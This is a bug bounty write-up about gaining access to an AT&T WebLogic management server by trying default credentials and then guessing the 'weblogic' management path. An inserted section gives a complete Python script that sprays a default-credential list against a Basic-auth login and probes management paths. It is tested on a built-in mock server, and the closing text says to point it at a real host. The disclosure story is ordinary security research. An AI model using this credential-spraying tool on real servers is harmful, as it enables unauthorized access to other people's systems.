A simple post-auth bypass leads to unauthorized web server access

Hi all, I hope you are doing well. I'm Hein Thant Zin, just a noob bug bounty hunter from Myanmar. This is my third write-up, about one of my recent findings on H1 (HackerOne).

The story began after a local CTF had finished. It was around Sept 1, and I wanted to get back into bug bounty for a month, so I decided to hunt bugs on AT&T with my friend.

After some days and a few duplicate reports, the night came.

It looked like a custom development subdomain with nothing interesting on it, just a simple login page for internal users. I tested it for auth bypass bugs but failed.

After some recon, he said "bro, there is a pop-up login page saying 'weblogic'".

[Image]
http://exapledevlopment.att.com/management/

I didn't even know what WebLogic was before. So I googled it and tried to log in using default credentials, but failed. Then I found this link: https://github.com/lanjelot/kb/blob/master/weblogic

After many failed attempts, I was able to log in using one of those credentials. Unfortunately, the response looked like this:

[Image]

Well, I couldn't figure out what was going on. I was stuck for a while and didn't know what to do next; by then it was about 2 am, so I went to bed.

The next day I woke up at 1 pm, picked up my laptop and started testing again. I tried brute-forcing directories and changing HTTP request methods, but all of it failed.

[Image]

I had almost given up when it suddenly occurred to me: why not try "weblogic" itself as a directory name? It does make sense, right?

I put that name in as a directory and boom! I had full access to their WebLogic server. I was able to view all the server information, their internal development apps and other sensitive information.
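Here is what the two steps above (spray a default-credential list against the Basic-auth prompt, then re-use the accepted pair to guess a path under it) look like as a script. This is an added example, not code from the original write-up or anything the author ran. It sprays a short credential list in the user:password format of the linked kb file against a Basic-auth URL, then probes a few candidate paths with the accepted pair and records status code and body size, so that an empty 200 (like the puzzling response above) stands apart from a 401 or a 404. Everything it talks to is a constructed local mock server embedded in the script; the credential entries, the "winning" pair weblogic:welcome1 and the candidate paths are assumptions, not values from the post. For context: on WebLogic 12.2.1 and later, the RESTful management interface is rooted at /management/weblogic/, which would explain why the bare /management/ answered with nothing useful while the "weblogic" subdirectory exposed server details.

```python
import base64
import json
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Constructed sample credential list in the user:password format of the kb file
# linked in the post (a few widely published WebLogic defaults plus a wrong one).
# The post does not say which entry worked; "weblogic:welcome1" is assumed here
# as the pair the mock accepts.
CRED_LIST = """\
weblogic:weblogic
system:Passw0rd
weblogic:welcome1
monitor:password
"""

# Candidate paths to probe once a credential is accepted. The post does not
# state exactly where "weblogic" was appended, so these are assumptions.
CANDIDATE_PATHS = ["/management/", "/management/weblogic/", "/console/"]

VALID_AUTH = base64.b64encode(b"weblogic:welcome1").decode()

# Opener without proxy handling so the mock on 127.0.0.1 is always reached directly.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


class MockWebLogicHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for the target: Basic auth everywhere, an empty
    200 at /management/, a JSON listing at /management/weblogic/, 404 elsewhere."""

    def do_GET(self):
        if self.headers.get("Authorization", "") != f"Basic {VALID_AUTH}":
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="weblogic"')
            self.end_headers()
            return
        if self.path == "/management/":
            body = b""
        elif self.path == "/management/weblogic/":
            body = json.dumps({"links": ["servers", "deployments"]}).encode()
        else:
            self.send_response(404)
            self.end_headers()
            return
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the example quiet
        pass


def start_mock_server():
    """Start the mock on a free localhost port and return its base URL."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), MockWebLogicHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{server.server_address[1]}"


def get(url, user, password):
    """One GET with an explicit Basic header; returns (status, body bytes)."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req = urllib.request.Request(url, headers={"Authorization": f"Basic {token}"})
    try:
        with OPENER.open(req, timeout=5) as resp:
            return resp.getcode(), resp.read()
    except urllib.error.HTTPError as e:
        return e.code, b""


def parse_creds(text):
    """Parse user:password lines, skipping blanks and '#' comments."""
    pairs = []
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and ":" in line:
            pairs.append(tuple(line.split(":", 1)))
    return pairs


def spray(url, creds):
    """Try each pair against url; return the first one not rejected with 401."""
    for user, password in creds:
        status, _ = get(url, user, password)
        if status != 401:
            return user, password
    return None


def probe_paths(base_url, cred, paths):
    """With a working pair, record (status, body length) for each candidate path."""
    user, password = cred
    return {p: (lambda s: (s[0], len(s[1])))(get(base_url + p, user, password)) for p in paths}


if __name__ == "__main__":
    base = start_mock_server()
    cred = spray(base + "/management/", parse_creds(CRED_LIST))
    print("accepted credential:", cred)
    for path, (status, size) in probe_paths(base, cred, CANDIDATE_PATHS).items():
        print(f"{status} {size:>5}  {path}")
```

Logging body length next to the status is the detail that matters here: a 200 with zero bytes is exactly the "what the hell is that" response the post describes, and it is the cue to keep walking the path rather than to write the credential off. Against a real target, swap the mock base URL for the in-scope host and feed the actual kb file to parse_creds.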

[Image]

Then I reported it to HackerOne. They triaged it and rewarded me after the report was resolved. I hope you enjoyed reading this. Follow me for more write-ups:

http://twitter.com/H3Lowr

Timeline:

Sept 14, 2019 - Reported

Sept 15, 2019 - Triaged by the H1 team

Oct 22, 2019 - Fixed and bounty awarded ($750)

See ya guys. I'll be back with the next finding soon... Thank you.
